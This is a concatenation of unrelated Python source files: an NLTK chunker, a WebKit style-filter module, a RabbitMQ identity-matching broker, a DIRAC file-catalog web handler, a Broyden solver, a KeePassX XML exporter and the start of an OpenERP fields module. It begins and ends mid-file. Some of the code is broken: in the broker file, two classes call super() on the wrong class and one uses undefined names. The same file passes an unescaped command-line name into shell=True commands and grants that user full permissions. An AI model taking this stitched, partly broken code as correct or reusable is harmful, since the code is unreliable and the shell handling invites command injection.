sent.leaves())) print(unigram_chunker.tagger.tag(postags)) #%% classifier based chunker # not only pos tag, but also word content class ConsecutiveNPChunkTagger(nltk.TaggerI): def __init__(self, train_sents): train_set = [] for tagged_sent in train_sents: untagged_sent = nltk.tag.untag(tagged_sent) history = [] for i, (word, tag) in enumerate(tagged_sent): featureset = npchunk_features(untagged_sent, i, history) train_set.append( (featureset, tag) ) history.append(tag) self.classifier = nltk.NaiveBayesClassifier.train( train_set) def tag(self, sentence): history = [] for i, word in enumerate(sentence): featureset = npchunk_features(sentence, i, history) tag = self.classifier.classify(featureset) history.append(tag) return zip(sentence, history) class ConsecutiveNPChunker(nltk.ChunkParserI): def __init__(self, train_sents): tagged_sents = [[((w,t),c) for (w,t,c) in nltk.chunk.tree2conlltags(sent)] for sent in train_sents] self.tagger = ConsecutiveNPChunkTagger(tagged_sents) def parse(self, sentence): tagged_sents = self.tagger.tag(sentence) conlltags = [(w,t,c) for ((w,t),c) in tagged_sents] return nltk.chunk.conlltags2tree(conlltags) #%% def npchunk_features(sentence,i,history): word,pos = sentence[i] if i == 0: prevword,prevpos = "<START>","<START>" else: prevword,prevpos = sentence[i-1] if i == len(sentence)-1: nextword,nextpos = "<END>","<END>" else: nextword,nextpos = sentence[i+1] return { "pos":pos, "prevpos":prevpos, "word":word, "nextpos":nextpos, "prevpos+pos":"%s+%s" % (prevpos,pos), "pos+nextpos":"%s+%s" % (pos,nextpos), "tags-since-dt":tags_since_dt(sentence,i)} def tags_since_dt(sentence,i): tags = set() for word,pos in sentence[:i]: if pos == "DT": tags = set() else: tags.add(pos) return '+'.join(sorted(tags)) #%% chunker = ConsecutiveNPChunker(train_sents) print(chunker.evaluate(test_sents))
# Copyright (C) 2010 Chris Jerdonek ([email protected]) # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Contains filter-related code.""" def validate_filter_rules(filter_rules, all_categories): """Validate the given filter rules, and raise a ValueError if not valid. Args: filter_rules: A list of boolean filter rules, for example-- ["-whitespace", "+whitespace/braces"] all_categories: A list of all available category names, for example-- ["whitespace/tabs", "whitespace/braces"] Raises: ValueError: An error occurs if a filter rule does not begin with "+" or "-" or if a filter rule does not match the beginning of some category name in the list of all available categories. """ for rule in filter_rules: if not (rule.startswith('+') or rule.startswith('-')): raise ValueError('Invalid filter rule "%s": every rule ' "must start with + or -." % rule) for category in all_categories: if category.startswith(rule[1:]): break else: raise ValueError('Suspected incorrect filter rule "%s": ' "the rule does not match the beginning " "of any category name." % rule) class _CategoryFilter(object): """Filters whether to check style categories.""" def __init__(self, filter_rules=None): """Create a category filter. Args: filter_rules: A list of strings that are filter rules, which are strings beginning with the plus or minus symbol (+/-). The list should include any default filter rules at the beginning. Defaults to the empty list. Raises: ValueError: Invalid filter rule if a rule does not start with plus ("+") or minus ("-"). """ if filter_rules is None: filter_rules = [] self._filter_rules = filter_rules self._should_check_category = {} # Cached dictionary of category to True/False def __str__(self): return ",".join(self._filter_rules) # Useful for unit testing. def __eq__(self, other): """Return whether this CategoryFilter instance is equal to another.""" return self._filter_rules == other._filter_rules # Useful for unit testing. def __ne__(self, other): # Python does not automatically deduce from __eq__(). return not (self == other) def should_check(self, category): """Return whether the category should be checked. The rules for determining whether a category should be checked are as follows. By default all categories should be checked. Then apply the filter rules in order from first to last, with later flags taking precedence. A filter rule applies to a category if the string after the leading plus/minus (+/-) matches the beginning of the category name. A plus (+) means the category should be checked, while a minus (-) means the category should not be checked. """ if category in self._should_check_category: return self._should_check_category[category] should_check = True # All categories checked by default. for rule in self._filter_rules: if not category.startswith(rule[1:]): continue should_check = rule.startswith('+') self._should_check_category[category] = should_check # Update cache. return should_check class FilterConfiguration(object): """Supports filtering with path-specific and user-specified rules.""" def __init__(self, base_rules=None, path_specific=None, user_rules=None): """Create a FilterConfiguration instance. Args: base_rules: The starting list of filter rules to use for processing. The default is the empty list, which by itself would mean that all categories should be checked. path_specific: A list of (sub_paths, path_rules) pairs that stores the path-specific filter rules for appending to the base rules. The "sub_paths" value is a list of path substrings. If a file path contains one of the substrings, then the corresponding path rules are appended. The first substring match takes precedence, i.e. only the first match triggers an append. The "path_rules" value is the tuple of filter rules that can be appended to the base rules. The value is a tuple rather than a list so it can be used as a dictionary key. The dictionary is for caching purposes in the implementation of this class. user_rules: A list of filter rules that is always appended to the base rules and any path rules. In other words, the user rules take precedence over the everything. In practice, the user rules are provided by the user from the command line. """ if base_rules is None: base_rules = [] if path_specific is None: path_specific = [] if user_rules is None: user_rules = [] self._base_rules = base_rules self._path_specific = path_specific self._path_specific_lower = None """The backing store for self._get_path_specific_lower().""" # FIXME: Make user rules internal after the FilterConfiguration # attribute is removed from ProcessorOptions (since at # that point ArgumentPrinter will no longer need to # access FilterConfiguration.user_rules). self.user_rules = user_rules self._path_rules_to_filter = {} """Cached dictionary of path rules to CategoryFilter instance.""" # The same CategoryFilter instance can be shared across # multiple keys in this dictionary. This allows us to take # greater advantage of the caching done by # CategoryFilter.should_check(). self._path_to_filter = {} """Cached dictionary of file path to CategoryFilter instance.""" # Useful for unit testing. def __eq__(self, other): """Return whether this FilterConfiguration is equal to another.""" if self._base_rules != other._base_rules: return False if self._path_specific != other._path_specific: return False if self.user_rules != other.user_rules: return False return True # Useful for unit testing. def __ne__(self, other): # Python does not automatically deduce this from __eq__(). return not self.__eq__(other) # We use the prefix "_get" since the name "_path_specific_lower" # is already taken up by the data attribute backing store. def _get_path_specific_lower(self): """Return a copy of self._path_specific with the paths lower-cased.""" if self._path_specific_lower is None: self._path_specific_lower = [] for (sub_paths, path_rules) in self._path_specific: sub_paths = map(str.lower, sub_paths) self._path_specific_lower.append((sub_paths, path_rules)) return self._path_specific_lower def _path_rules_from_path(self, path): """Determine the path-specific rules to use, and return as a tuple.""" path = path.lower() for (sub_paths, path_rules) in self._get_path_specific_lower(): for sub_path in sub_paths: if path.find(sub_path) > -1: return path_rules return () # Default to the empty tuple. def _filter_from_path_rules(self, path_rules): """Return the CategoryFilter associated to a path rules tuple.""" # We reuse the same CategoryFilter where possible to take # advantage of the caching they do. if path_rules not in self._path_rules_to_filter: rules = list(self._base_rules) # Make a copy rules.extend(path_rules) rules.extend(self.user_rules) self._path_rules_to_filter[path_rules] = _CategoryFilter(rules) return self._path_rules_to_filter[path_rules] def _filter_from_path(self, path): """Return the CategoryFilter associated to a path.""" if path not in self._path_to_filter: path_rules = self._path_rules_from_path(path) filter = self._filter_from_path_rules(path_rules) self._path_to_filter[path] = filter return self._path_to_filter[path] def should_check(self, category, path): """Return whether the given category should be checked. This method determines whether a category should be checked by checking the category name against the filter rules for the given path. For a given path, the filter rules are the combination of the base rules, the path-specific rules, and the user-provided rules -- in that order. As we will describe below, later rules in the list take precedence. The path-specific rules are the rules corresponding to the first element of the "path_specific" parameter that contains a string case-insensitively matching some substring of the path. If there is no such element, there are no path-specific rules for that path. Given a list of filter rules, the logic for determining whether a category should be checked is as follows. By default all categories should be checked. Then apply the filter rules in order from first to last, with later flags taking precedence. A filter rule applies to a category if the string after the leading plus/minus (+/-) matches the beginning of the category name. A plus (+) means the category should be checked, while a minus (-) means the category should not be checked. Args: category: The category name. path: The path of the file being checked. """ return self._filter_from_path(path).should_check(category)
#!/usr/bin/env python import sys import os import getopt import time import random from messageQueue import MessageQueue VERSION = 0.5 REQUEST_EXCHANGE = {"name":"Request", "ex_type":"headers"} IDENTIFY_EXCHANGE = {"name":"Identify", "ex_type":"headers"} RESULTS_EXCHANGE = {"name":"Results", "ex_type":"headers"} TRANSFORM_EXCHANGE = {"name":"Transform", "ex_type":"headers"} WEB_EXCHANGE = {"name":"Web", "ex_type":"headers"} NIST_EXCHANGE = {"name":"NIST", "ex_type":"headers"} SETTINGS_EXCHANGE = {'name':'settings','ex_type':'x-lvc'} EXCHANGES = [REQUEST_EXCHANGE,IDENTIFY_EXCHANGE,RESULTS_EXCHANGE,TRANSFORM_EXCHANGE, WEB_EXCHANGE, NIST_EXCHANGE] class MessageBrokerBase(MessageQueue): # Base class def __init__(self, node_name, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,routing_key='',settings=None): super(MessageBrokerBase, self).__init__(node_name, user_id,settings=settings) self.exchange = exchange_info self.setup() self.request_queue=self.queue_bind(self.exchange, header) #, routing_key) self.log( 'starting '+self.__class__.__name__+' binding to '+exchange_info["name"]) def start(self, ): self.start_consume(self.request_queue) def local_exchage(self, ): return {"name":self.node_name, "ex_type":"headers"} def setup(self, ): pass #self.queue_name = self.channel.queue_declare( exclusive=False, queue = self.node_name).method.queue # queue = "aa_"+self.node_name class Broker(MessageBrokerBase): # the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE def __init__(self, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,settings=None): super(Broker, self).__init__("Broker", user_id,header, exchange_info,settings=settings) def setup(self, ): #setup the exchanges super(Broker, self).setup() for exchange in EXCHANGES: self.channel.exchange_declare(exchange=exchange["name"], type=exchange["ex_type"]) def on_return_status(self, properties): # called as RPC to return the status of a sent msg return "[OK] from %s"%self.node_name def on_recieve_callback(self, ch, method, properties, body): super(Broker,self).on_recieve_callback(ch, method, properties, body) if 'filetype' in properties.headers: import sys,re import json sys.path.append("..") import modules.NISTutility as nu #try: filename = './output.eft' filestr = re.search(r'base64,(.*)', json.loads(body)['file_content']).group(1) output = open(filename, 'wb') output.write(filestr.decode('base64')) output.close() NISTResult=nu.convertNIST(filename,'jpg','new_i'+filename) self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False) #except: # self.send(WEB_EXCHANGE, "ERROR", properties.headers, False) if 'setup' in properties.headers: # Send the message back to the receiever exchange = RESULTS_EXCHANGE if properties.headers['requester']=='Web': exchange = WEB_EXCHANGE body = "Exchange params" self.send(exchange, body, properties.headers,routing_key=properties.headers['requester']) else: # Send the message onto the Identify Exchange self.send(IDENTIFY_EXCHANGE, body, properties.headers, False) class Transformer(MessageBrokerBase): # the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE def __init__(self, user_id="guest",header={},exchange_info = TRANSFORM_EXCHANGE,settings=None): super(Broker, self).__init__("Transformer", user_id,header, exchange_info,settings=settings) def on_recieve_callback(self, ch, method, properties, body): super(Broker,self).on_recieve_callback(ch, method, properties, body) self.send(IDENTIFY_EXCHANGE, body, properties.headers, False) class NISTExtractor(MessageBrokerBase): # the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE def __init__(self, user_id="guest",header={},exchange_info = NIST_EXCHANGE,settings=None): import sys import json sys.path.append("..") import modules.NISTutility as nu super(Broker, self).__init__("NISTExtractor", user_id,header, exchange_info,settings=settings) def on_recieve_callback(self, ch, method, properties, body): super(Broker,self).on_recieve_callback(ch, method, properties, body) NISTResult=nu.convertNIST(eftname,'jpg','new_i'+eftname) self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False) class MsgLog(MessageQueue): # the logging class - binds to the fire_host def __init__(self, user_id="guest",header={},settings=None): super(MsgLog, self).__init__("Logger", user_id,settings=settings) self.channel.queue_declare(queue='firehose-queue', durable=False,auto_delete=True, exclusive=True) self.request_queue=self.queue_bind({"name":"Results"},queue_name= 'firehose-queue', routing_key='#') self.request_queue=self.queue_bind({"name":"Web"},queue_name= 'firehose-queue', routing_key='#') #self.request_queue=self.queue_bind({"name":"Request"},queue_name= 'firehose-queue', routing_key='#') self.request_queue=self.queue_bind({"name":"Identify"},queue_name= 'firehose-queue', routing_key='#') def on_recieve_callback(self, ch, method, properties, body): #self.log(body) if 'requester' in properties.headers: self.log("from %s for %s to %s"%( properties.headers['requester'], properties.headers['destination']['name'], properties.headers['last_node'])) self.log(str(properties.user_id)) #else: #self.log(str(properties)) body)) #self.log(str(method)) #self.log(str( def start(self, ): self.start_consume(self.request_queue) class Matcher(MessageBrokerBase): # the matcher class - binds to the IDENTIFY_EXCHANGE # undertakes match and puts return on the RESULTS_EXCHANGE queue with the routing_key of the name def __init__(self, node_name, user_id="guest",header={},exchange_info = IDENTIFY_EXCHANGE,settings=None): header.update({"from_node":node_name}) super(Matcher, self).__init__(node_name, user_id,header, exchange_info,settings=settings) def on_recieve_callback(self, ch, method, properties, body): super(Matcher,self).on_recieve_callback(ch, method, properties, body) self.log('Matching '+str(properties.headers)) if 'requester' in properties.headers and not(self.node_name == properties.headers['requester']): # make sure not to match our own request body = "Match score = %f from %s"%(random.random(),self.node_name) self.log("doing match - sending "+body) exchange = RESULTS_EXCHANGE if properties.headers['requester']=='Web': exchange = WEB_EXCHANGE self.log("my exchange is "+str(exchange)) self.send(exchange, body, properties.headers,routing_key=properties.headers['requester']) class Requester(MessageQueue): # the match request class - sends a request on the REQUEST_EXCHANGE def __init__(self, node_name, user_id="guest",settings=None): super(Requester, self).__init__(node_name, user_id,settings=settings) def send(self, msg,header): header.update({self.node_name:True,'requester':self.node_name}) super(Requester,self).send(REQUEST_EXCHANGE,msg,header,True) class Receiver(MessageBrokerBase): # retrieve the results from the RESULTS_EXCHANGE def __init__(self, node_name, user_id="guest",header={},exchange_info = RESULTS_EXCHANGE,settings=None): super(Receiver, self).__init__(node_name, user_id,header, exchange_info, settings=settings,routing_key=node_name) #routing_key=node_name, def on_recieve_callback(self, ch, method, properties, body): super(Receiver,self).on_recieve_callback(ch, method, properties, body) self.log("recieved "+body) if __name__ == "__main__": import argparse from subprocess import check_call # Parse command line args # note that args can be read from a file using the @ command parser = argparse.ArgumentParser(description='Identity Verification Service',fromfile_prefix_chars='@') parser.add_argument('--rabbitmq_host', default='localhost', help='set the rabbitmq url (default localhost)') parser.add_argument('--redis_host', default='localhost', help='set the redis url (default localhost)') parser.add_argument('--redis_port', default=6379, help='set the redis port (default 6379)') parser.add_argument('--is_broker','-b', action='store_true', help='Is the broker') parser.add_argument('--is_matcher','-m', action='store_true', help='Is a matcher') parser.add_argument('--is_requester','-r', action='store_true', help='Is a requester') parser.add_argument('--is_receiver','-e', action='store_true', help='Is a reciever') parser.add_argument('--is_logger','-l', action='store_true', help='Is a logger') parser.add_argument('--name','-n', default='[No Name]', help='Name of the agency/node') parser.add_argument('--version', action='version', version='%(prog)s '+str(VERSION)) args = parser.parse_args() header={"test":"test"} if args.is_matcher: check_call('python rabbitmqadmin.py declare user name="%s" password="guest" tags="Australia_NZ,Bali"'%args.name,shell=True) s = 'python rabbitmqadmin.py declare permission vhost="/" user="%s" configure=".*" write=".*" read=".*"'%args.name check_call(s,shell=True) matcher = Matcher(args.name,args.name,header,settings=args) matcher.start() elif args.is_broker: broker = Broker("broker",header,settings=args) #queue=broker.queue_bind(dest_queue, header) broker.start() #_consume(queue) elif args.is_requester: requester = Requester(args.name,args.name,settings=args) requester.send("Hello",header) elif args.is_receiver: receiver = Receiver(args.name,args.name,{args.name:True},settings=args) receiver.start() elif args.is_logger: logger = MsgLog("broker",header,settings=args) logger.start() #sendRequest(my_queue, dest_queue, priority, m_type, d_file)
from chula.www.controller.base import Controller
from WebAppDIRAC.Lib.WebHandler import WebHandler, asyncGen from DIRAC.Resources.Catalog.FileCatalog import FileCatalog from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup from DIRAC import gConfig, gLogger from DIRAC.Core.Utilities import Time from hashlib import md5 class FileCatalogHandler( WebHandler ): AUTH_PROPS = "authenticated" def __init__(self, *args, **kwargs ): super( FileCatalogHandler, self ).__init__( *args, **kwargs ) sessionData = self.getSessionData() self.user = sessionData['user'].get( 'username', '' ) self.group = sessionData['user'].get( 'group', '' ) self.vo = getVOForGroup( self.group ) self.fc = FileCatalog( vo = self.vo ) ''' Method to read all the available fields possible for defining a query ''' @asyncGen def web_getMetadataFields(self): self.L_NUMBER = 0 self.S_NUMBER = 0 result = yield self.threadTask( self.fc.getMetadataFields ) gLogger.debug( "request: %s" % result ) if not result[ "OK" ] : gLogger.error( "getSelectorGrid: %s" % result[ "Message" ] ) self.finish({ "success" : "false" , "error" : result[ "Message" ] }) return result = result["Value"] callback = {} if not result.has_key( "FileMetaFields" ): error = "Service response has no FileMetaFields key" gLogger.error( "getSelectorGrid: %s" % error ) self.finish({ "success" : "false" , "error" : error }) return if not result.has_key( "DirectoryMetaFields" ): error = "Service response has no DirectoryMetaFields key" gLogger.error( "getSelectorGrid: %s" % error ) self.finish({ "success" : "false" , "error" : error }) return filemeta = result[ "FileMetaFields" ] if len( filemeta ) > 0 : for key , value in filemeta.items(): callback[key]= "label" gLogger.debug( "getSelectorGrid: FileMetaFields callback %s" % callback ) dirmeta = result[ "DirectoryMetaFields" ] if len( dirmeta ) > 0 : for key , value in dirmeta.items(): callback[key]= value.lower() gLogger.debug( "getSelectorGrid: Resulting callback %s" % callback ) self.finish({ "success" : "true" , "result" : callback}) ''' Method to read all the available options for a metadata field ''' @asyncGen def web_getQueryData( self ): try: compat = dict() for key in self.request.arguments: parts = str( key ).split(".") if len(parts)!=3: continue key = str( key ) name = parts[1] sign = parts[2] if not len( name ) > 0: continue value = str( self.request.arguments[ key ][0] ).split("|") #check existence of the 'name' section if not compat.has_key(name): compat[name] = dict() #check existence of the 'sign' section if not compat[name].has_key(sign): if value[0]=="v": compat[name][sign] = "" elif value[0]=="s": compat[name][sign] = [] if value[0]=="v": compat[name][sign] = value[1] elif value[0]=="s": compat[name][sign] += value[1].split(":::") except Exception, e: self.finish({ "success" : "false" , "error" : "Metadata query error" }) return path = "/" if self.request.arguments.has_key("path") : path = self.request.arguments["path"][0] gLogger.always( compat ) result = yield self.threadTask( self.fc.getCompatibleMetadata, compat, path ) gLogger.always( result ) if not result[ "OK" ]: self.finish({ "success" : "false" , "error" : result[ "Message" ] }) return self.finish({ "success" : "true" , "result" : result["Value"] }) @asyncGen def web_getFilesData( self ) : req = self.__request() gLogger.always(req) gLogger.debug( "submit: incoming request %s" % req ) result = yield self.threadTask( self.fc.findFilesByMetadataWeb, req["selection"] , req["path"] , self.S_NUMBER , self.L_NUMBER) gLogger.debug( "submit: result of findFilesByMetadataDetailed %s" % result ) if not result[ "OK" ] : gLogger.error( "submit: %s" % result[ "Message" ] ) self.finish({ "success" : "false" , "error" : result[ "Message" ] }) return result = result[ "Value" ] if not len(result) > 0: self.finish({ "success" : "true" , "result" : [] , "total" : 0, "date":"-" }) return total = result[ "TotalRecords" ] result = result[ "Records" ] callback = list() for key , value in result.items() : size = "" if "Size" in value: size = value[ "Size" ] date = "" if "CreationDate" in value: date = str( value[ "CreationDate" ] ) meta = "" if "Metadata" in value: m = value[ "Metadata" ] meta = '; '.join( [ '%s: %s' % ( i , j ) for ( i , j ) in m.items() ] ) dirnameList = key.split("/") dirname = "/".join(dirnameList[:len(dirnameList)-1]) filename = dirnameList[len(dirnameList)-1:] callback.append({"fullfilename":key, "dirname": dirname, "filename" : filename , "date" : date , "size" : size , "metadata" : meta }) timestamp = Time.dateTime().strftime("%Y-%m-%d %H:%M [UTC]") self.finish({ "success" : "true" , "result" : callback , "total" : total, "date":timestamp}) def __request(self): req = { "selection" : {} , "path" : "/" } self.L_NUMBER = 25 if self.request.arguments.has_key( "limit" ) and len( self.request.arguments[ "limit" ][0] ) > 0: self.L_NUMBER = int( self.request.arguments[ "limit" ][0] ) self.S_NUMBER = 0 if self.request.arguments.has_key( "start" ) and len( self.request.arguments[ "start" ][0] ) > 0: self.S_NUMBER = int( self.request.arguments[ "start" ][0] ) result = gConfig.getOption( "/WebApp/ListSeparator" ) if result[ "OK" ] : separator = result[ "Value" ] else: separator = ":::" result = self.fc.getMetadataFields() gLogger.debug( "request: %s" % result ) if not result["OK"]: gLogger.error( "request: %s" % result[ "Message" ] ) return req result = result["Value"] if not result.has_key( "FileMetaFields" ): error = "Service response has no FileMetaFields key. Return empty dict" gLogger.error( "request: %s" % error ) return req if not result.has_key( "DirectoryMetaFields" ): error = "Service response has no DirectoryMetaFields key. Return empty dict" gLogger.error( "request: %s" % error ) return req filemeta = result[ "FileMetaFields" ] dirmeta = result[ "DirectoryMetaFields" ] meta = [] for key,value in dirmeta.items() : meta.append( key ) gLogger.always( "request: metafields: %s " % meta ) for param in self.request.arguments : tmp = str( param ).split( '.' ) if len( tmp ) != 3 : continue name = tmp[1] logic = tmp[2] value = self.request.arguments[param][0].split("|") if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] : gLogger.always( "Operand '%s' is not supported " % logic ) continue if name in meta : #check existence of the 'name' section if not req[ "selection" ].has_key(name): req[ "selection" ][name] = dict() #check existence of the 'sign' section if not req[ "selection" ][name].has_key(logic): if value[0]=="v": req[ "selection" ][name][logic] = "" elif value[0]=="s": req[ "selection" ][name][logic] = [] if value[0]=="v": req[ "selection" ][name][logic] = value[1] elif value[0]=="s": req[ "selection" ][name][logic] += value[1].split(":::") if self.request.arguments.has_key("path") : req["path"] = self.request.arguments["path"][0] gLogger.always("REQ: ",req) return req def __request_file(self): req = { "selection" : {} , "path" : "/" } separator = ":::" result = self.fc.getMetadataFields() gLogger.debug( "request: %s" % result ) if not result["OK"]: gLogger.error( "request: %s" % result[ "Message" ] ) return req result = result["Value"] if not result.has_key( "FileMetaFields" ): error = "Service response has no FileMetaFields key. Return empty dict" gLogger.error( "request: %s" % error ) return req if not result.has_key( "DirectoryMetaFields" ): error = "Service response has no DirectoryMetaFields key. Return empty dict" gLogger.error( "request: %s" % error ) return req filemeta = result[ "FileMetaFields" ] dirmeta = result[ "DirectoryMetaFields" ] meta = [] for key,value in dirmeta.items() : meta.append( key ) gLogger.always( "request: metafields: %s " % meta ) selectionElems=self.request.arguments["selection"][0].split("<|>") gLogger.always( "request: THISSSS %s " % self.request.arguments["selection"][0] ) for param in selectionElems: tmp = str( param ).split( '|' ) if len( tmp ) != 4 : continue name = tmp[0] logic = tmp[1] if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] : gLogger.always( "Operand '%s' is not supported " % logic ) continue if name in meta : #check existence of the 'name' section if not req[ "selection" ].has_key(name): req[ "selection" ][name] = dict() #check existence of the 'sign' section if not req[ "selection" ][name].has_key(logic): if tmp[2]=="v": req[ "selection" ][name][logic] = "" elif tmp[2]=="s": req[ "selection" ][name][logic] = [] if tmp[2]=="v": req[ "selection" ][name][logic] = tmp[3] elif tmp[2]=="s": req[ "selection" ][name][logic] += tmp[3].split(":::") if self.request.arguments.has_key("path") : req["path"] = self.request.arguments["path"][0] gLogger.always("REQ: ",req) return req @asyncGen def web_getMetadataFilesInFile( self ): self.set_header('Content-type','text/plain') self.set_header('Content-Disposition', 'attachment; filename="error.txt"') req = self.__request_file() gLogger.always(req) gLogger.debug( "submit: incoming request %s" % req ) result = yield self.threadTask( self.fc.findFilesByMetadata, req["selection"] , req["path"]) if not result[ "OK" ] : gLogger.error( "submit: %s" % result[ "Message" ] ) self.finish({ "success" : "false" , "error" : result[ "Message" ] }) return result = result[ "Value" ] retStrLines = [] if len(result)>0: for fileName in result: retStrLines.append(fileName) strData = "\n".join(retStrLines) self.set_header('Content-type','text/plain') self.set_header('Content-Disposition', 'attachment; filename="%s.txt"' % md5( str( req ) ).hexdigest()) self.set_header('Content-Length', len( strData )) self.finish(strData) @asyncGen def web_getSubnodeFiles( self ): path = self.request.arguments["path"][0] # print path # path = "/vo.cta.in2p3.fr" result = yield self.threadTask( self.fc.listDirectory, path, False) if not result[ "OK" ] : gLogger.error( "submit: %s" % result[ "Message" ] ) self.finish({ "success" : "false" , "error" : result[ "Message" ] }) return # print result filesData = result["Value"]["Successful"][path]["Files"] dirData = result["Value"]["Successful"][path]["SubDirs"] retData = [] for entryName in dirData: nodeDef = { 'text' : entryName.split("/")[-1] } nodeDef[ 'leaf' ] = False nodeDef[ 'expanded' ] = False retData.append(nodeDef) for entryName in filesData: nodeDef = { 'text' : entryName.split("/")[-1] } nodeDef[ 'leaf' ] = True retData.append(nodeDef) retData = sorted(retData, key=lambda node: node['text'].upper()) self.finish({"success" : "true", "nodes":retData})
#!/usr/bin/env python3 from erros import NaoConverge from numpy import matrix from numpy.linalg import inv from numpy.linalg import norm def SolucaoEqNLinearBroyden(xin, bi, tol, niter, F): xold = xin bold = matrix(bi) tolerancia = 1 while (tolerancia > tol and niter != -1): f = matrix(F(xold)) if f.size == 1: f = f.transpose() j = bold jinv = inv(j) deltax = -1 * jinv * f deltax = deltax.transpose() #usado para realizar a soma com Xold xnew = deltax + xold deltax = deltax.transpose() #voltar ao normal xnew = list(xnew.flat) y = matrix(F(xnew)) - matrix(F(xold)) bnew = bold + ((y - bold*deltax)*deltax.transpose()) / (deltax.transpose()*deltax) tolerancia = norm(deltax) / norm(xnew) niter -= 1 xold = xnew bold = bnew if niter == -1: raise NaoConverge return xold if __name__ == "__main__": F = lambda x: [[x[0] + 2 * x[1] - 2], [x[0]*x[0] + 4 * x[1]*x[1] - 4]] try: print(SolucaoEqNLinearBroyden([2,3], [[1,2],[4,24]], 0.0001, 100, F)) except NaoConverge: print("Convergence not reached")
""" Support for exporting database to KeePassX XML format. """ from __future__ import absolute_import from datetime import datetime from xml.etree import ElementTree as ET from xml.dom import minidom from keepassdb import const class XmlExporter(object): """ Class for exporting database to KeePassX XML format. :ivar include_comment: Whether to include a 'generated-by' comment in the header. :ivar prettyprint: Whether to generate pretty-printed XML (indent, etc.). """ include_comment = False prettyprint = True def __init__(self, include_comment=False, prettyprint=True): self.include_comment = include_comment self.prettyprint = prettyprint def export(self, db): """ Export the dbnode to KeePassX XML format. :param db: The database to export. :type db: :class:`keepassdb.db.Database` """ dbnode = ET.Element('database') if self.include_comment: now = datetime.now() filepath = db.filepath if filepath: comment = ET.Comment('Generated by keepassdb from {0} on {1}'.format(filepath, now.strftime("%c"))) else: comment = ET.Comment('Generated by keepassdb on {0}'.format(now.strftime("%c"))) dbnode.append(comment) def _date(dt): if dt == const.NEVER: return 'Never' else: # 2012-12-20T20:56:56 return dt.strftime('%Y-%m-%dT%H:%M:%S') def group_to_xml(group, node): gnode = ET.SubElement(node, 'group') title = ET.SubElement(gnode, 'title') title.text = group.title icon = ET.SubElement(gnode, 'icon') icon.text = str(group.icon) for subgroup in group.children: group_to_xml(subgroup, gnode) for entry in group.entries: if entry.title == 'Meta-Info' and entry.username == 'SYSTEM': continue enode = ET.SubElement(gnode, 'entry') ET.SubElement(enode, 'title').text = entry.title ET.SubElement(enode, 'username').text = entry.username ET.SubElement(enode, 'password').text = entry.password ET.SubElement(enode, 'url').text = entry.url ET.SubElement(enode, 'comment').text = entry.notes ET.SubElement(enode, 'icon').text = str(entry.icon) ET.SubElement(enode, 'creation').text = _date(entry.created) ET.SubElement(enode, 'lastaccess').text = _date(entry.accessed) ET.SubElement(enode, 'lastmod').text = _date(entry.modified) ET.SubElement(enode, 'expire').text = _date(entry.expires) return gnode for group in db.root.children: dbnode.append(group_to_xml(group, dbnode)) xmlstr = ET.tostring(dbnode) if self.prettyprint: reparsed = minidom.parseString(xmlstr) xmlstr = reparsed.toprettyxml(indent=" ") return xmlstr
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2013-2014 OpenERP (<http://www.openerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## """ High-level objects for fields. """ from datetime import date, datetime from functools import partial from operator import attrgetter from types import NoneType import logging import pytz import xmlrpclib from openerp.tools import float_round, ustr, html_sanitize from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT DATE_LENGTH = len(date.today().strftime(DATE_FORMAT)) DATETIME_LENGTH = len(datetime.now().strftime(DATETIME_FORMAT)) _logger = logging.getLogger(__name__) class SpecialValue(object): """ Encapsulates a value in the cache in place of a normal value. """ def __init__(self, value): self.value = value def get(self): return self.value class FailedValue(SpecialValue): """ Special value that encapsulates an exception instead of a value. """ def __init__(self, exception): self.exception = exception def get(self): raise self.exception def _check_value(value): """ Return `value`, or call its getter if `value` is a :class:`SpecialValue`. """ return value.get() if isinstance(value, SpecialValue) else value def resolve_all_mro(cls, name, reverse=False): """ Return the (successively overridden) values of attribute `name` in `cls` in mro order, or inverse mro order if `reverse` is true. 